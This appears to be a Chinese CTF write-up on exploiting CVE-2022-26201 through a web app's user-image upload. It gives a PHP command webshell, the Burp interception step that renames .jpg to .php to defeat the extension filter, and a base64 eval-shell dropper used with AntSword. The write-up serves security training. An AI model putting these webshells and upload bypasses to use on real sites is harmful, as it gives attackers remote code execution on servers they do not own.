当前位置: 首页 > article >正文

CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users,访问一下,能创建用户,有个能上传图片的地方

普通的一句话木马无法访问flag,需要创建一个权限马

<?php system($_GET[1]);phpinfo();?>

因为只能上传jpg形式的文件,所以更改文件后缀名为jpg

使用bp抓包,更改后缀为php,使用重放器发送

上传成功

访问img/上传的php文件名 /flag,得到flag:flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST['a']);?>

木马内容:

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包,重放器发送

生成shell.php文件,木马是以base64的形式。

蚁剑路径为img/shell.php,编码器为base6,根目录下找到flag


http://www.kler.cn/a/412872.html

相关文章:

  • 代码美学2:MATLAB制作渐变色
  • 【计算机网络】多路转接之epoll
  • urllib3只支持OpenSSL1.1.1
  • 15分钟做完一个小程序,腾讯这个工具有点东西
  • pytest 通过实例讲清单元测试、集成测试、测试覆盖率
  • 深度神经网络模型压缩学习笔记二:离线量化算法和工具、实现原理和细节
  • JVM调优篇之JVM基础入门AND字节码文件解读
  • 2.mybatis整体配置
  • Scrapy管道设置和数据保存
  • 房屋结构安全监测系统守护房屋安全卫士
  • 【Opencv学习】PART1-图像基础处理
  • Python中的简单爬虫
  • 三菱PLC 梯形图内嵌ST编程说明(GX WORKS3)
  • DRM(数字权限管理技术)防截屏录屏----视频转hls流加密、web解密播放
  • 2024/11/27学习日志
  • 微软正在测试 Windows 11 对第三方密钥的支持
  • AI时代的PPT革命:智能生成PPT工具为何备受青睐?
  • Goland或Idea启动报错
  • 泷羽sec学习打卡-shell命令3
  • leetcode hot100【LeetCode 136. 只出现一次的数字】java实现
  • 网络安全问题与大忌
  • CAD 2008安装教程软件下载
  • 【离散数学】集合关于其上等价关系的商集【1】
  • 基于Java的小程序电商商城开源设计源码
  • Android Glide批量加载Bitmap,拼接组装大Bitmap,更新单个AppCompatImageView,Kotlin(2)
  • 使用Azure合成语音,解放嘴巴(bushi)